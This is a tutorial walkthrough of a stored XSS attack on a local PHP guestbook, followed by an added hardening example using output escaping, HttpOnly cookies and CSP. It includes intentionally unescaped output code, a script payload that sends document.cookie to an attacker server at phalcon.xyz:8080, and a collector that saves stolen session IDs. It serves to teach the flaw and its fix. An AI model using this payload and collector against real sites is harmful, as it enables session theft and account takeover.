Principle: the XSS payload is saved into the database and then rendered dynamically on the web page (stored XSS).
We use the local server as the victim; the attacker's server is http://phalcon.xyz:8080
1. Create a new file named message.php
<?php
session_start();
// connect to the database
try {
$con = new PDO('mysql:host=127.0.0.1;dbname=xss_message;port=3316', 'root', "111111");
$con->exec("set names utf8");
} catch (PDOException $e) {
echo $e->getMessage();
}
try{
$sql = "SELECT * from `message` ORDER BY id desc";
$prepare = $con->prepare($sql);
$prepare->execute();
$res = $prepare->fetchAll(PDO::FETCH_ASSOC);
}catch (PDOException $e){
echo $e->getMessage();
}
?>
<!DOCTYPE html>
<html>
<head>
<title>xss攻击</title>
<meta charset="utf-8">
</head>
<body>
<form action="form.php" method="post">
姓名:<input type="text" name="name" id=""><br>
留言:<textarea rows="4" cols="30" name="message" style="margin-top:5px;"></textarea><br/>
<input type="submit" name="" value='提交'>
</form>
<br/>留言记录:<br/>
<?php foreach($res as $val){?>
<?php echo $val['name'];?>:<span style="color:red"><?php echo $val['message'];?></span><br>
<?php } ?>
</body>
</html>
2. Create a new file form.php that saves the submitted data
<?php
// connect to the database
try {
$con = new PDO('mysql:host=127.0.0.1;dbname=xss_message;port=3316', 'root', "111111");
$con->exec("set names utf8");
} catch (PDOException $e) {
echo $e->getMessage();
}
$name = trim($_POST['name']);
$message = trim($_POST['message']);
if(empty($name) or empty($message)){
header('Location: ./message.php');
return false;
}
try{
$sql = "INSERT INTO `message` (`name`,`message`) VALUES (:name,:message)";
$prepare = $con->prepare($sql);
$data = $prepare->execute(array(':name'=>$name,':message'=>$message));
header('Location: ./message.php');
}catch (PDOException $e){
echo $e->getMessage();
}
?>
3. Paste the malicious code into the message box
<script>
var Str=document.cookie;
var a =document.createElement('a');
a.href='http://phalcon.xyz:8080/getCookie.php?'+Str;
a.innerHTML="<img src='./aa.jpg'>";
document.body.appendChild(a);
</script>
Click Submit to insert it into the database.
View the page source:
<html>
<head>
<title>xss攻击</title>
<meta charset="utf-8">
</head>
<body>
<form action="form.php" method="post">
姓名:<input type="text" name="name" id=""><br>
留言:<textarea rows="4" cols="30" name="message" style="margin-top:5px;"></textarea><br/>
<input type="submit" name="" value='提交'>
</form>
<br/>留言记录:<br/>
xss:<span style="color:red"><script>
var Str=document.cookie;
var a =document.createElement('a');
a.href='http://phalcon.xyz:8080/getCookie.php?'+Str;
a.innerHTML="<img src='./aa.jpg'>";
document.body.appendChild(a);
</script></span><br>
1111:<span style="color:red">222</span><br>
</html>
4. On the attacker's server, collect the session ID
<?php
$cookie=$_GET['PHPSESSID'];
file_put_contents('xss.txt',$cookie);
?>
When a user clicks the image, their session ID is stolen.
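The root cause is that message.php echoes `$val['name']` and `$val['message']` straight into the HTML, and the session cookie is readable from `document.cookie`. As an added example (not code from the original post), here is the rendering part of message.php hardened with output escaping, an HttpOnly session cookie and a CSP that blocks inline scripts; the `$res` rows are constructed sample data standing in for the `fetchAll()` result:

```php
<?php
// Added hardening example; not part of the original post.
// 1. Mark the session cookie HttpOnly so the browser never exposes PHPSESSID
//    through document.cookie. This must be set before session_start().
session_set_cookie_params([
    'httponly' => true,
    'samesite' => 'Lax',
    'secure'   => isset($_SERVER['HTTPS']),
]);
session_start();

// 2. Defence in depth: refuse inline <script> even if escaping is ever missed.
header("Content-Security-Policy: script-src 'self'");

// 3. Escape every untrusted value at the point it is written into HTML.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Constructed sample rows; in message.php these come from the `message` table.
$res = [
    ['name' => 'xss',  'message' => '<script>var Str=document.cookie;</script>'],
    ['name' => '1111', 'message' => '222'],
];
?>
<!DOCTYPE html>
<html>
<head>
<title>xss攻击</title>
<meta charset="utf-8">
</head>
<body>
<br/>留言记录:<br/>
<?php foreach ($res as $val) { ?>
<?php echo h($val['name']); ?>:<span style="color:red"><?php echo h($val['message']); ?></span><br>
<?php } ?>
</body>
</html>
```

With `h()` applied, the first row is rendered as the literal text `&lt;script&gt;...&lt;/script&gt;` instead of being executed, and even an unescaped payload elsewhere could no longer read the session cookie.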